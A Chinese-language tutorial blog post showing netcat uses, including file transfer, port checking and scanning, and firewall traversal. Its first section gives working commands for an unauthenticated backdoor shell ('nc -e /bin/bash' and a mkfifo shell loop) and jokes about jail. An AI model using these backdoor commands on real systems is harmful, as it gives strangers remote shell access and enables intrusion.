原创:小姐姐味道(ID:xjjdog),欢迎分享,转载请保留出处。任何不保留此声明的转载都是抄袭。
对于nc命令来说,可真的是要一行代码调半天。因为这行代码的威力是非常大的!当然,用不好的话,还会给自身带来麻烦。
netcat这个工具,简称nc,是Linux上一个非常强大的工具(当然也有windows版本)。由于它能力实在太强,有些公司甚至对他进行了隔离(quarantined)。比如rename掉,或者给000的权限。因为它很容易可以在服务器上开一个后门(backdoor),并且及其方便。
我的两台服务器上都安装了nc,首先用whereis nc,它在哪里?
它告诉我,文件在/usr/bin目录下。我们使用file命令来看一下它的属性。结果发现它是一个链接文件。
从这里能看出来,nc的全称是ncat: Concatenate and redirect sockets。 这是一把瑞士军刀。
nc的参数非常多,如果列出来,会让你失去兴趣,白白错过这么厉害的工具,也错过了进局子的机会。 我们还是以案例来说明,这款不到1MB的命令,为什么俘获了xjjdog的芳心。
1.服务器上安装后门
下面的命令,将在机器上开放5879端口。
服务端:
# nc -l -vv -p 5879 -e /bin/bash
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::5879
Ncat: Listening on 0.0.0.0:5879
这个过程叫做反弹shell,远程就可以使用nc命令连接,做一些事情。
客户端:
# nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
此时,执行任何shell命令,都可以正常运行。下面这张gif动画可以验证这个过程。
想要更霸道一点的么?我们需要借助 mkfifo 命令。
在服务器上,执行下面两个命令,这就构造了一个循环。
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/bash -i 2>&1 | nc -l 5879 > /tmp/f
客户端nc连接以后,竟然直接出现了命令行操作终端!
$ nc -v 192.16.1.54 5879
Connection to 192.16.1.54 port 5879 [tcp/*] succeeded!
[root@localhost~]#
你可能会说,我客户端关掉之后,为什么服务端的命令也退出了?如果你想要服务端继续监听,可以加上参数 -k 。
2. 文件和目录传送
还在用sftp?还是用rzsz?
这些工具虽然好用,但需要安装。有时候事情紧急,或者权限把的严,并没有这样的工具。
此时,nc可以来帮忙。
服务端同样监听一个端口,但是这次把重定向定向到一个文件。
nc -l 5879 > file
客户端就可以启动一个命令将文件发送过去。这次是使用反向的箭头。
nc -v 192.16.1.54 5879 < redis-5.0.5.tar.gz
文件传的飞快!而且由于没有rsa那一套的加密,速度更快了。
查看它们的md5,一模一样。
MD5 (redis-5.0.5.tar.gz) = 224cabf26d622f37528b398762e1578c
md5sum file
224cabf26d622f37528b398762e1578c file
我知道你的脑子里现在在想着怎么传送目录了。这个过程很有意思。
我们把nc的输出,使用管道交给tar命令处理。 xfvz 和 cvfz 是一对参数,你应该猜到要怎么做了。
nc -l 5879 | tar xfvz -
没错,客户端的代码与上面的是相反的。不过这次,我们的nc命令接收了打包的文件。
tar cfz - redis-5.0.5 | nc -v 192.16.1.54 5879
3.网络连通性检测
没错,这是nc命令最常用的地方了。
如果你想要判断服务器的tomcat端口是否开启,不需要登陆到服务器上,然后再ps一下看一下进程,或者使用netstat -antl看一下监听的端口。
使用nc就可以了。
只需要简单的打上ip和端口,它就能知道结果。
# nc -vvv baidu.com 443
Connection to baidu.com port 443 [tcp/https] succeeded!
当然,它也可以扫描主机的端口开放情况。
不过对程序员来说用的不多。
nc -vzw 2 192.16.1.54 8888-9999
4.防火墙穿透
比如下面这张图。你想要访问 tongariro 的这台机器,但是你是没有权限的。它只能通过 aoraki 的防火墙访问。同时, aoraki 也只能接受来自 ruapehu 的请求。
通过组合ssh命令可以达到这个效果。
ssh -A -t ruapehu.example.com ssh -A -t aoraki ssh -A tongariro
通过ssh的 ProxyCommand ,可以完成简单的配置。
使用下面的命令可以快速打通这个通道。
ssh -oProxyCommand="ssh host1 nc host2 22" host2
5.其他
你可以看到了 nc 的这些能力,不是nc自身提供的,而是其他额外的命令。
比如,这里实现一个简单的时间服务器。web浏览器访问即可获取。
ncat -lkp 8976 --sh-exec 'echo -ne "HTTP/1.0 200 OK\r\n\r\nThe date is "; date;'
再比如,做一个远程视频服务。
服务端。
arecord -f cd -c 2 | lame -b128 - - | netcat -u your-ip 6881 | mpg123 -
客户端。
arecord -f cd -c 2 | lame -b128 - - | netcat -u -l 6881 | mpg123 -****